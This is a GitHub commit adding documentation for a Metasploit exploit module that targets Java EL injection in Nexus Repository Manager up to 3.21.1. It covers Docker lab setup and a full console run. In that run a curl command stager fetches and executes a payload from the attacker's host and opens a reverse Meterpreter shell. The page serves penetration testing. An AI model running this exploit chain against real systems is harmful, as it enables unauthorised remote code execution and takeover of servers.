-
Notifications
You must be signed in to change notification settings - Fork 13.8k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
122 additions
and
0 deletions.
There are no files selected for viewing
122 changes: 122 additions & 0 deletions
122
documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,122 @@ | ||
| ## Vulnerable Application | ||
|
|
||
| ### Description | ||
|
|
||
| This module exploits a Java Expression Language (EL) injection in Nexus | ||
| Repository Manager versions up to and including 3.21.1 to execute code | ||
| as the Nexus user. Tested against 3.21.1-01. | ||
|
|
||
| ### Setup | ||
|
|
||
| Install Docker using the [official instructions](https://docs.docker.com/get-docker/). | ||
| Follow the instructions for your platform and distribution (if using | ||
| Linux). If you're using OS X, you may prefer to `brew cask install docker` | ||
| after installing [Homebrew](https://brew.sh/). | ||
|
|
||
| Run `docker run -d -p 8081:8081 --name nexus sonatype/nexus3:3.21.1` | ||
| (note the added `3.21.1` tag) as per Sonatype's [Docker Hub instructions](https://hub.docker.com/r/sonatype/nexus3/#running). | ||
|
|
||
| ### Targets | ||
|
|
||
| ``` | ||
| Id Name | ||
| -- ---- | ||
| 0 Nexus Repository Manager <= 3.21.1 | ||
| ``` | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| Follow [Setup](#setup) and [Scenarios](#scenarios). | ||
|
|
||
| ## Options | ||
|
|
||
| ### USERNAME | ||
|
|
||
| Set this to a valid Nexus username. | ||
|
|
||
| ### PASSWORD | ||
|
|
||
| Set this to a valid Nexus password. | ||
|
|
||
| ## Scenarios | ||
|
|
||
| ### Nexus Repository Manager 3.21.1-01 from [Docker Hub](https://hub.docker.com/r/sonatype/nexus3) | ||
|
|
||
| ``` | ||
| msf5 > use exploit/linux/http/nexus_repo_manager_el_injection | ||
| msf5 exploit(linux/http/nexus_repo_manager_el_injection) > options | ||
| Module options (exploit/linux/http/nexus_repo_manager_el_injection): | ||
| Name Current Setting Required Description | ||
| ---- --------------- -------- ----------- | ||
| PASSWORD admin yes Nexus password | ||
| Proxies no A proxy chain of format type:host:port[,type:host:port][...] | ||
| RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' | ||
| RPORT 8081 yes The target port (TCP) | ||
| SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 | ||
| SRVPORT 8080 yes The local port to listen on. | ||
| SSL false no Negotiate SSL/TLS for outgoing connections | ||
| SSLCert no Path to a custom SSL certificate (default is randomly generated) | ||
| TARGETURI / yes Base path | ||
| URIPATH no The URI to use for this exploit (default is random) | ||
| USERNAME admin yes Nexus username | ||
| VHOST no HTTP server virtual host | ||
| Payload options (linux/x64/meterpreter_reverse_tcp): | ||
| Name Current Setting Required Description | ||
| ---- --------------- -------- ----------- | ||
| LHOST yes The listen address (an interface may be specified) | ||
| LPORT 4444 yes The listen port | ||
| Exploit target: | ||
| Id Name | ||
| -- ---- | ||
| 0 Nexus Repository Manager <= 3.21.1 | ||
| msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set rhosts 127.0.0.1 | ||
| rhosts => 127.0.0.1 | ||
| msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set lhost 192.168.1.3 | ||
| lhost => 192.168.1.3 | ||
| msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run | ||
| [*] Started reverse TCP handler on 192.168.1.3:4444 | ||
| [*] Executing automatic check (disable AutoCheck to override) | ||
| [+] The target appears to be vulnerable. Nexus 3.21.1-01 is a vulnerable version. | ||
| [*] Logging in with admin:admin | ||
| [+] Logged in with NXSESSIONID=8b6fd077-1830-4e2b-90e8-2997d260b5c0; | ||
| [*] Using URL: http://0.0.0.0:8080/t6NXrxF | ||
| [*] Local IP: http://192.168.1.3:8080/t6NXrxF | ||
| [*] Generated command stager: ["curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF", "chmod +x /tmp/hgzeytII", "/tmp/hgzeytII", "rm -f /tmp/hgzeytII"] | ||
| [*] Executing command: curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF | ||
| [+] Successfully executed command: curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF | ||
| [*] Client 192.168.1.3 (curl/7.61.1) requested /t6NXrxF | ||
| [*] Sending payload to 192.168.1.3 (curl/7.61.1) | ||
| [*] Command Stager progress - 50.00% done (54/108 bytes) | ||
| [*] Executing command: chmod +x /tmp/hgzeytII | ||
| [+] Successfully executed command: chmod +x /tmp/hgzeytII | ||
| [*] Command Stager progress - 70.37% done (76/108 bytes) | ||
| [*] Executing command: /tmp/hgzeytII | ||
| [+] Successfully executed command: /tmp/hgzeytII | ||
| [*] Command Stager progress - 82.41% done (89/108 bytes) | ||
| [*] Executing command: rm -f /tmp/hgzeytII | ||
| [+] Successfully executed command: rm -f /tmp/hgzeytII | ||
| [*] Command Stager progress - 100.00% done (108/108 bytes) | ||
| [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:53094) at 2020-04-07 19:25:38 -0500 | ||
| [*] Server stopped. | ||
| meterpreter > getuid | ||
| Server username: no-user @ 282665c16215 (uid=200, gid=200, euid=200, egid=200) | ||
| meterpreter > sysinfo | ||
| Computer : 172.17.0.2 | ||
| OS : Red Hat Enterprise Linux 8 (Linux 4.19.76-linuxkit) | ||
| Architecture : x64 | ||
| BuildTuple : x86_64-linux-musl | ||
| Meterpreter : x64/linux | ||
| meterpreter > | ||
| ``` |